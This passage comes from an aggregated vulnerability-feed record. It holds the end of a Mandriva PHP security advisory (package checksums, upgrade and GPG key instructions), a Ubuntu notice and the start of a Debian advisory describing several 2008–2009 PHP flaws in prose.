7f1fd373649c8af3936c3a2c80d2d03e 2008.1/x86_64/php-openssl-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n ed5c02a83a387666a2ac96b8b56c03d3 2008.1/x86_64/php-pcntl-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n eba67947e0ed0eeda43a8872af9b75b3 2008.1/x86_64/php-pdo-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 70e4469edcd51c6bf2628065017ffed7 2008.1/x86_64/php-pdo_dblib-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 1d2da700fe9b49dfc645dc96533de2d3 2008.1/x86_64/php-pdo_mysql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 2e698a1721ee05ba8018aa394351f622 2008.1/x86_64/php-pdo_odbc-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 4e34a31560a44e21a92075276ae6fb69 2008.1/x86_64/php-pdo_pgsql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 0785495ba82441704c4c41c1844d6149 2008.1/x86_64/php-pdo_sqlite-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n aa2b9a5d2271fa40bc7074c2ee16b2f9 2008.1/x86_64/php-pgsql-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 56832ddbeb8e20f94fe7332891e203ff 2008.1/x86_64/php-posix-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 15acc7fe100acc365d35d0d5826f883b 2008.1/x86_64/php-pspell-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n f238474dcb6ffcab2f2f3500d39a1c65 2008.1/x86_64/php-readline-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 809d3792ccdab501e0137600b4453314 2008.1/x86_64/php-recode-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 45a0d7ad5e2dbee271c3fe08594f0e51 2008.1/x86_64/php-session-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n a2cdaec928ee3e747009e9a5002e5e23 2008.1/x86_64/php-shmop-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n b93cd9fbd226f65db3b7641258dd1ce2 2008.1/x86_64/php-snmp-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n d9545793c3efdacbc1dfc5bb4890acb3 2008.1/x86_64/php-soap-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 0cbf907e1b6a484e558276d927c87a89 2008.1/x86_64/php-sockets-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n eae5af025e4fd0c5075f1c26c36022cb 2008.1/x86_64/php-sqlite-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 37e4d43c03f74a529aed0baa68835fc6 2008.1/x86_64/php-sysvmsg-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n c78265474f375646e3f749c97359718d 2008.1/x86_64/php-sysvsem-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 8c7de8e3c20e1c97ff3c2e89015d6c25 2008.1/x86_64/php-sysvshm-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 3abe61ac7b93363078ddd705178a13c6 2008.1/x86_64/php-tidy-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 120fd0678453a1ce19499daeecb5c48d 2008.1/x86_64/php-tokenizer-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 3343908cfcb8637f1c51834a9b07c1a3 2008.1/x86_64/php-wddx-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n c8288f3c966582139ad17f7861bbe9ae 2008.1/x86_64/php-xml-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 4469c36e90e4bc1bc33e475db3916b26 2008.1/x86_64/php-xmlreader-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 315a5f4078528a5e941e69b50dfab119 2008.1/x86_64/php-xmlrpc-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 1581ce3d86e8c7c4b0a4fe053fa5943a 2008.1/x86_64/php-xmlwriter-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n 6a9b22fdc3704ce032b8ff69a835085d 2008.1/x86_64/php-xsl-5.2.5-14.4mdv2008.1.x86_64.rpm\r\n ae4d0e61d1aba23b9baa304d4a662316 2008.1/x86_64/php-zlib-5.2.5-14.4mdv2008.1.x86_64.rpm \r\n c5bb17d306abc830af1e3289d0feb87e 2008.1/SRPMS/php-5.2.5-14.4mdv2008.1.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n f72d3b1d596b4f3e6d3e5734017ae1d2 2009.0/i586/libphp5_common5-5.2.6-18.3mdv2009.0.i586.rpm\r\n b70b5a44a084ab088cd7a1e2c96d75be 2009.0/i586/php-bcmath-5.2.6-18.3mdv2009.0.i586.rpm\r\n db8eda5e9355a4abac1c2fa056c8bdaf 2009.0/i586/php-bz2-5.2.6-18.3mdv2009.0.i586.rpm\r\n 31291a92a5d92afffa45f80fbd66a193 2009.0/i586/php-calendar-5.2.6-18.3mdv2009.0.i586.rpm\r\n f031463a25e0eafd33ca6f9671986380 2009.0/i586/php-cgi-5.2.6-18.3mdv2009.0.i586.rpm\r\n edb7d50dcb61c5b28714e27e9632fef4 2009.0/i586/php-cli-5.2.6-18.3mdv2009.0.i586.rpm\r\n ce6bd87c1424004bdbf80a59d8edcbdd 2009.0/i586/php-ctype-5.2.6-18.3mdv2009.0.i586.rpm\r\n ed2c69240fb11fa5e24ae283fd3f0576 2009.0/i586/php-curl-5.2.6-18.3mdv2009.0.i586.rpm\r\n e9bbbc7cb51f33526ac9a3c353e1dcef 2009.0/i586/php-dba-5.2.6-18.3mdv2009.0.i586.rpm\r\n 07d9fb7ece146328895ae2a7133ec454 2009.0/i586/php-dbase-5.2.6-18.3mdv2009.0.i586.rpm\r\n 84fbf3636d32d58d372d80790ace3505 2009.0/i586/php-devel-5.2.6-18.3mdv2009.0.i586.rpm\r\n 146ab157a25ada5dc9b3607cf7e458dd 2009.0/i586/php-dom-5.2.6-18.3mdv2009.0.i586.rpm\r\n 6ac54813f1322b20ab2fca52af6f9b59 2009.0/i586/php-exif-5.2.6-18.3mdv2009.0.i586.rpm\r\n 7436417fa8e2325c8cff794f8696304b 2009.0/i586/php-fcgi-5.2.6-18.3mdv2009.0.i586.rpm\r\n ecbe0d0c774edd2e359528fde4cee6c5 2009.0/i586/php-filter-5.2.6-18.3mdv2009.0.i586.rpm\r\n 4de456ace608699dcfc4f28679d3ed7b 2009.0/i586/php-ftp-5.2.6-18.3mdv2009.0.i586.rpm\r\n 359220d70d4be36d059b652edf00fff5 2009.0/i586/php-gd-5.2.6-18.3mdv2009.0.i586.rpm\r\n 1f0ad71963146c84840780acbcb0ad55 2009.0/i586/php-gettext-5.2.6-18.3mdv2009.0.i586.rpm\r\n 4adc622e706cc10deaa885bc14fca519 2009.0/i586/php-gmp-5.2.6-18.3mdv2009.0.i586.rpm\r\n 5c75a244754b5c1084ee8e8d4fd4a2da 2009.0/i586/php-hash-5.2.6-18.3mdv2009.0.i586.rpm\r\n 36228f1479aa715385f18067ddb382bf 2009.0/i586/php-iconv-5.2.6-18.3mdv2009.0.i586.rpm\r\n b997947d6ab76681ac9dd6b0e69fc06c 2009.0/i586/php-imap-5.2.6-18.3mdv2009.0.i586.rpm\r\n 39d4a6fb1920101652d0a9f4f392e4fe 2009.0/i586/php-json-5.2.6-18.3mdv2009.0.i586.rpm\r\n 1da4900455c839ab9fb09bb486342b83 2009.0/i586/php-ldap-5.2.6-18.3mdv2009.0.i586.rpm\r\n 55deab4b204838cc040c7a7d5c92efc2 2009.0/i586/php-mbstring-5.2.6-18.3mdv2009.0.i586.rpm\r\n 0e57d6b6118a25eb157ec58d154fa5b1 2009.0/i586/php-mcrypt-5.2.6-18.3mdv2009.0.i586.rpm\r\n 31180aaae42bd0f32201ea28f0f86aad 2009.0/i586/php-mhash-5.2.6-18.3mdv2009.0.i586.rpm\r\n 913f7aefe94633147983070e8efd4afa 2009.0/i586/php-mime_magic-5.2.6-18.3mdv2009.0.i586.rpm\r\n 0ac4c1576514019f6f9e41cf0347e155 2009.0/i586/php-ming-5.2.6-18.3mdv2009.0.i586.rpm\r\n 622f174fac61ac88e14eeaddd0d39dd0 2009.0/i586/php-mssql-5.2.6-18.3mdv2009.0.i586.rpm\r\n 397666097b969ab25e006526ced22f04 2009.0/i586/php-mysql-5.2.6-18.3mdv2009.0.i586.rpm\r\n b1e565e8fa3c3eaf29fb1662de8e5307 2009.0/i586/php-mysqli-5.2.6-18.3mdv2009.0.i586.rpm\r\n 4d46a7baa48bfcc1fec55dd0548e23ee 2009.0/i586/php-ncurses-5.2.6-18.3mdv2009.0.i586.rpm\r\n 9c7706e4433b263cd9e3582e5918893e 2009.0/i586/php-odbc-5.2.6-18.3mdv2009.0.i586.rpm\r\n 5bd5bd2e82481713df12f910b356a464 2009.0/i586/php-openssl-5.2.6-18.3mdv2009.0.i586.rpm\r\n 06b3d734e8efb7ead5db0d66372a8eba 2009.0/i586/php-pcntl-5.2.6-18.3mdv2009.0.i586.rpm\r\n f685c56f503fa7ee55c072f706c5f12d 2009.0/i586/php-pdo-5.2.6-18.3mdv2009.0.i586.rpm\r\n 494913c1dbd24d13a3e53f0f94976e7c 2009.0/i586/php-pdo_dblib-5.2.6-18.3mdv2009.0.i586.rpm\r\n ff86b7a00fbbfa5d1cd8e9e62e00e58c 2009.0/i586/php-pdo_mysql-5.2.6-18.3mdv2009.0.i586.rpm\r\n 8152ef86fbefdb271a0a8bed4612dfb8 2009.0/i586/php-pdo_odbc-5.2.6-18.3mdv2009.0.i586.rpm\r\n 54836ddbb393bb84f14864e2926e5c56 2009.0/i586/php-pdo_pgsql-5.2.6-18.3mdv2009.0.i586.rpm\r\n 323e193a27a4141e3f63357315973110 2009.0/i586/php-pdo_sqlite-5.2.6-18.3mdv2009.0.i586.rpm\r\n 8663e75f8ff00082cc88e3470fc3fe14 2009.0/i586/php-pgsql-5.2.6-18.3mdv2009.0.i586.rpm\r\n fccc09bf3215b3bc76647f046743602d 2009.0/i586/php-posix-5.2.6-18.3mdv2009.0.i586.rpm\r\n 280b2c80ba27512803aed11fea0751a5 2009.0/i586/php-pspell-5.2.6-18.3mdv2009.0.i586.rpm\r\n af53cd4fac7df275ecbc18f693d309d1 2009.0/i586/php-readline-5.2.6-18.3mdv2009.0.i586.rpm\r\n 28e3b4fcac9beed4f2efe590a5d09ef1 2009.0/i586/php-recode-5.2.6-18.3mdv2009.0.i586.rpm\r\n ebb6595e5c1b613373f87056dc82ee4f 2009.0/i586/php-session-5.2.6-18.3mdv2009.0.i586.rpm\r\n ccebafe18a9cd4211ba8fc43c9c8ecf5 2009.0/i586/php-shmop-5.2.6-18.3mdv2009.0.i586.rpm\r\n 1ecbe12b56c50787db123b8e73b4ad9f 2009.0/i586/php-snmp-5.2.6-18.3mdv2009.0.i586.rpm\r\n dc0d6dc9c18971e7ae032f5038817d09 2009.0/i586/php-soap-5.2.6-18.3mdv2009.0.i586.rpm\r\n 2160d4f86d28c3ac1886a4b6a0b23545 2009.0/i586/php-sockets-5.2.6-18.3mdv2009.0.i586.rpm\r\n f72ee93391f9e3dface795d5dbfeda99 2009.0/i586/php-sqlite-5.2.6-18.3mdv2009.0.i586.rpm\r\n 60aeeb93274532fe224c5beb801df15d 2009.0/i586/php-sybase-5.2.6-18.3mdv2009.0.i586.rpm\r\n b3803e6e7914c5912d67bb0e85ae2ead 2009.0/i586/php-sysvmsg-5.2.6-18.3mdv2009.0.i586.rpm\r\n a14394d6fa538fae4d5902560b395a8c 2009.0/i586/php-sysvsem-5.2.6-18.3mdv2009.0.i586.rpm\r\n b7c6414e5144dd7e061068bfd9dd0e54 2009.0/i586/php-sysvshm-5.2.6-18.3mdv2009.0.i586.rpm\r\n 95c53411a670dc52ca68099dd2164b50 2009.0/i586/php-tidy-5.2.6-18.3mdv2009.0.i586.rpm\r\n a3c21fd780e82217173668bd2291030d 2009.0/i586/php-tokenizer-5.2.6-18.3mdv2009.0.i586.rpm\r\n 9fa159c8fb66c6831471ae4d95118b25 2009.0/i586/php-wddx-5.2.6-18.3mdv2009.0.i586.rpm\r\n 57833f2edfb42f0726a52c704c072181 2009.0/i586/php-xml-5.2.6-18.3mdv2009.0.i586.rpm\r\n 940fc7e8b5165331ccb5a7568b6889ff 2009.0/i586/php-xmlreader-5.2.6-18.3mdv2009.0.i586.rpm\r\n b59378dc6a60fb4de45ee899b5732f10 2009.0/i586/php-xmlrpc-5.2.6-18.3mdv2009.0.i586.rpm\r\n 62b83e8ec57ff04fca9bfba5bc32e85d 2009.0/i586/php-xmlwriter-5.2.6-18.3mdv2009.0.i586.rpm\r\n cad6dfc72ba90c1ae1e161560bdfb09c 2009.0/i586/php-xsl-5.2.6-18.3mdv2009.0.i586.rpm\r\n af0f735b6798d0811010dcb4c2a7f81e 2009.0/i586/php-zlib-5.2.6-18.3mdv2009.0.i586.rpm \r\n b20c32eb23068d90025422202af824e5 2009.0/SRPMS/php-5.2.6-18.3mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 1677f83b6b8861cfe22302cb1575f376 2009.0/x86_64/lib64php5_common5-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2a9acca7bed660eb110c3b39a8f6f92d 2009.0/x86_64/php-bcmath-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n b724f73dd8313e98c42e9c9dd648627f 2009.0/x86_64/php-bz2-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n e6659ea2a6956e142417839b9559140e 2009.0/x86_64/php-calendar-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 1844e2cf4af9e6d977a5afc205f2917b 2009.0/x86_64/php-cgi-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 515be43d736da244e25adc8a80503bb3 2009.0/x86_64/php-cli-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 77f6e73ba9b06f983c876c7f336a77af 2009.0/x86_64/php-ctype-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n cecdc481b01b009b8e3945c5fe084ca8 2009.0/x86_64/php-curl-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n bd1891c813094860abc8d400d67d8cb0 2009.0/x86_64/php-dba-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 86e7be79c0c028c8099952098ff7471c 2009.0/x86_64/php-dbase-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 9aaeeeaccb645a4808452e5bfa64ec93 2009.0/x86_64/php-devel-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 9bf6f3f9da95b7b4b65d386af9a0cd23 2009.0/x86_64/php-dom-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n c41984bb036e75ed94b1874d9b6ff905 2009.0/x86_64/php-exif-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n ce271b31a4efb0714e32c31c383f0843 2009.0/x86_64/php-fcgi-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 089b190ecd5d8e7a51ef09e3864beee0 2009.0/x86_64/php-filter-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 7dad613fa43a0ef77c81fc5d18e286db 2009.0/x86_64/php-ftp-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 268311d2d48ada48217dd99140f41ee2 2009.0/x86_64/php-gd-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 44cc67db9cd8a7828c28ae25b652df43 2009.0/x86_64/php-gettext-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n d6e5747e71a31bce3e417a19345def04 2009.0/x86_64/php-gmp-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 58042a16dd35d7381426dc3d0c9f0d61 2009.0/x86_64/php-hash-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n dca63f9fca627ed557a1b7d276ccc89f 2009.0/x86_64/php-iconv-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 9da39c2f4505ad84d2addc8aab0be72c 2009.0/x86_64/php-imap-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 0dac93b98b6a8cc22823966d22acae35 2009.0/x86_64/php-json-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n d97297b721af42fcee9079f9da6f00cd 2009.0/x86_64/php-ldap-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 0219f5924cbe290585b2679ce9628965 2009.0/x86_64/php-mbstring-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 8f386693506417ed675afaa93d7a74c0 2009.0/x86_64/php-mcrypt-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n b510504e1fd4395160f511202aa99205 2009.0/x86_64/php-mhash-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2960e9c3e32b15a0f7e218605e686bcc 2009.0/x86_64/php-mime_magic-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n e4bf93a9d5248d38837ae54dde21a735 2009.0/x86_64/php-ming-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 5a7e875fddbcb69281000b5aed1091e0 2009.0/x86_64/php-mssql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 0c387ce3b7fde69cf696f0c3adeffacd 2009.0/x86_64/php-mysql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 013da902befd9a10bc75d31ba33e6ef5 2009.0/x86_64/php-mysqli-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 47f8032d425f6fc6b767d1678058eefe 2009.0/x86_64/php-ncurses-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n c26d02612e36dad905823cee9ce9cb07 2009.0/x86_64/php-odbc-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 4e58eef9892f483a93f3db37d18418d9 2009.0/x86_64/php-openssl-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 42e434e0902918c22b9a3960a4cdd764 2009.0/x86_64/php-pcntl-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2bdbef90526afc81809431a068098a20 2009.0/x86_64/php-pdo-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 0e4a678e1145a0a5ccefb0db9edcf9eb 2009.0/x86_64/php-pdo_dblib-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 5a7eb81ff57ba8bcdb5fdaca3d3cd9c1 2009.0/x86_64/php-pdo_mysql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2807f66c40629a791e10b3de63574814 2009.0/x86_64/php-pdo_odbc-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 99261d1350efacc3d0d3a8c4f570a483 2009.0/x86_64/php-pdo_pgsql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 4f7c7707b09e5b9d4e25c27466d49f90 2009.0/x86_64/php-pdo_sqlite-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 80c3a1d479bdd704841cc284945d6384 2009.0/x86_64/php-pgsql-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 7672ddc52ae4310c9ca1b56bff611c03 2009.0/x86_64/php-posix-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n ae82652a42301ad71a5d464df80e45d6 2009.0/x86_64/php-pspell-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n b499d861ed3844a0e012f67d44daf2da 2009.0/x86_64/php-readline-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 52dc45f191a6d40c750db1db9192303c 2009.0/x86_64/php-recode-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2e23b1880a577225e5dcc68ba1487c22 2009.0/x86_64/php-session-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 52e44e76fd66aaaeab22fe50f246a199 2009.0/x86_64/php-shmop-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n fd4b242725e03dd3ed4820455c344518 2009.0/x86_64/php-snmp-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n c500a028138b535784500a43c1d6f384 2009.0/x86_64/php-soap-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n a9a46258d2c05951e0293d7f73e3af92 2009.0/x86_64/php-sockets-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n b57fc84ff9809cc4c6285712ecc9771c 2009.0/x86_64/php-sqlite-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 167b240500b2c53b87d577db2c0702f8 2009.0/x86_64/php-sybase-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 49f0debaea7baf9882233854f86b18c9 2009.0/x86_64/php-sysvmsg-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n aae13312a26200026de7d750f5428d95 2009.0/x86_64/php-sysvsem-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 4b8507a1575955b9091aae3499b6d5d7 2009.0/x86_64/php-sysvshm-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n effb73b94df0ce5e1f029b38d84b2cd0 2009.0/x86_64/php-tidy-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n ef2897836ef8be930dd2dab6b33b251a 2009.0/x86_64/php-tokenizer-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 3edb14da528869d1d9365aa8bfdaac72 2009.0/x86_64/php-wddx-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 34c634415faf8d831b8e75f32ad41538 2009.0/x86_64/php-xml-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 8488eef085ba118e31879e32c39772be 2009.0/x86_64/php-xmlreader-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 74756c45ae06718f6232714b9bab055e 2009.0/x86_64/php-xmlrpc-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 8ac25444070c67fb858ab009d916e9ab 2009.0/x86_64/php-xmlwriter-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 3551f65ddd2c4937a5ec75528f3c1371 2009.0/x86_64/php-xsl-5.2.6-18.3mdv2009.0.x86_64.rpm\r\n 2363f602ac7384bc114e3f222fd4eb95 2009.0/x86_64/php-zlib-5.2.6-18.3mdv2009.0.x86_64.rpm \r\n b20c32eb23068d90025422202af824e5 2009.0/SRPMS/php-5.2.6-18.3mdv2009.0.src.rpm\r\n\r\n Corporate 4.0:\r\n d406669c2d2f94a8402343fd6bf0df25 corporate/4.0/i586/libphp5_common5-5.1.6-1.12.20060mlcs4.i586.rpm\r\n 6e585f72c7492e2559d184cdfa55beae corporate/4.0/i586/php-cgi-5.1.6-1.12.20060mlcs4.i586.rpm\r\n d67996d52c00a5b3f4f00d35bdc90188 corporate/4.0/i586/php-cli-5.1.6-1.12.20060mlcs4.i586.rpm\r\n 932c83cf0648bdd9b6f209097550c3c7 corporate/4.0/i586/php-devel-5.1.6-1.12.20060mlcs4.i586.rpm\r\n 92c539bebbb5c3817b7fd78f7517959d corporate/4.0/i586/php-fcgi-5.1.6-1.12.20060mlcs4.i586.rpm\r\n 29216a235396d18c175a3dc022285c37 corporate/4.0/i586/php-mbstring-5.1.6-1.3.20060mlcs4.i586.rpm \r\n 6a538adffaaca7cfa9b4000ead754808 corporate/4.0/SRPMS/php-5.1.6-1.12.20060mlcs4.src.rpm\r\n 1768f58b0dc0aa15a5f4349455cdafc4 corporate/4.0/SRPMS/php-mbstring-5.1.6-1.3.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n e44d2798fe9e1e8f2d3c749c1c5040b6 corporate/4.0/x86_64/lib64php5_common5-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n 2f5b3ec25a830c7941090b9add54589d corporate/4.0/x86_64/php-cgi-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n 7b76a96665a14726ef57ea937438dd06 corporate/4.0/x86_64/php-cli-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n 288cb0f92fa4ca27fe1c2c758895e2fd corporate/4.0/x86_64/php-devel-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n fd9be7647a87623c051fe257b3b7c784 corporate/4.0/x86_64/php-fcgi-5.1.6-1.12.20060mlcs4.x86_64.rpm\r\n db1f62123547503bf8a4b6252ef495c3 corporate/4.0/x86_64/php-mbstring-5.1.6-1.3.20060mlcs4.x86_64.rpm \r\n 6a538adffaaca7cfa9b4000ead754808 corporate/4.0/SRPMS/php-5.1.6-1.12.20060mlcs4.src.rpm\r\n 1768f58b0dc0aa15a5f4349455cdafc4 corporate/4.0/SRPMS/php-mbstring-5.1.6-1.3.20060mlcs4.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFJsBQ3mqjQ0CJFipgRAh0lAKDQBkTRQ5uoRcqLtSQ0PmRJi4zAPgCg8ndA\r\n/JhqK6p7yB2SxgBbpXjlQMI=\r\n=TtCV\r\n-----END PGP SIGNATURE-----", "modified": "2009-03-06T00:00:00", "published": "2009-03-06T00:00:00", "id": "SECURITYVULNS:DOC:21425", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21425", "title": "[ MDVSA-2009:066 ] php", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:10:07", "bulletinFamily": "unix", "description": "It was discovered that PHP did not sanitize certain error messages when display_errors is enabled, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. With cross-site scripting vulnerabilities, if a user were tricked into viewing server output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data (such as passwords), within the same domain. (CVE-2008-5814)\n\nIt was discovered that PHP did not properly handle the mbstring.func_overload setting within .htaccess files when using virtual hosts. A virtual host administrator could use this flaw to cause settings to be applied to other virtual hosts on the same server. (CVE-2009-0754)\n\nIt was discovered that PHP did not properly handle certain malformed strings when being parsed by the json_decode function. A remote attacker could exploit this flaw and cause the PHP server to crash, resulting in a denial of service. This issue only affected Ubuntu 8.04 and 8.10. (CVE-2009-1271)", "modified": "2009-04-20T00:00:00", "published": "2009-04-20T00:00:00", "id": "USN-761-1", "href": "https://usn.ubuntu.com/761-1/", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:14:31", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1789-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMay 04, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-2107 CVE-2008-2108 CVE-2008-5557 CVE-2008-5624\n CVE-2008-5658 CVE-2008-5814 CVE-2009-0754 CVE-2009-1271 \nDebian Bugs : 507101 507857 508021 511493 523028 523049 \n\nSeveral remote vulnerabilities have been discovered in the PHP 5\nhypertext preprocessor. The Common Vulnerabilities and Exposures\nproject identifies the following problems.\n\nThe following four vulnerabilities have already been fixed in the stable\n(lenny) version of php5 prior to the release of lenny. This update now\naddresses them for etch (oldstable) aswell:\n\nCVE-2008-2107 / CVE-2008-2108\n\n The GENERATE_SEED macro has several problems that make predicting\n generated random numbers easier, facilitating attacks against measures\n that use rand() or mt_rand() as part of a protection.\n\nCVE-2008-5557\n\n A buffer overflow in the mbstring extension allows attackers to execute\n arbitrary code via a crafted string containing an HTML entity.\n\nCVE-2008-5624\n\n The page_uid and page_gid variables are not correctly set, allowing\n use of some functionality intended to be restricted to root.\n\nCVE-2008-5658\n\n Directory traversal vulnerability in the ZipArchive::extractTo function\n allows attackers to write arbitrary files via a ZIP file with a file\n whose name contains .. (dot dot) sequences.\n\nThis update also addresses the following three vulnerabilities for both\noldstable (etch) and stable (lenny):\n\nCVE-2008-5814\n\n Cross-site scripting (XSS) vulnerability, when display_errors is enabled,\n allows remote attackers to inject arbitrary web script or HTML.\n\nCVE-2009-0754\n\n When running on Apache, PHP allows local users to modify behavior of\n other sites hosted on the same web server by modifying the\n mbstring.func_overload setting within .htaccess, which causes this\n setting to be applied to other virtual hosts on the same server. \n\nCVE-2009-1271\n\n The JSON_parser function allows a denial of service (segmentation fault)\n via a malformed string to the json_decode API function.\n\nFurthermore, two updates originally scheduled for the next point update for\noldstable are included in the etch package:\n\n * Let PHP use the system timezone database instead of the embedded\n timezone database which is out of date.\n \n * From the source tarball, the unused 'dbase' module has been removed\n which contained licensing problems.\n\nFor the old stable distribution (etch), these problems have been fixed in\nversion 5.2.0+dfsg-8+etch15.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.2.6.dfsg.1-1+lenny3.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.2.9.dfsg.1-1.\n\nWe recommend that you upgrade your php5 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource 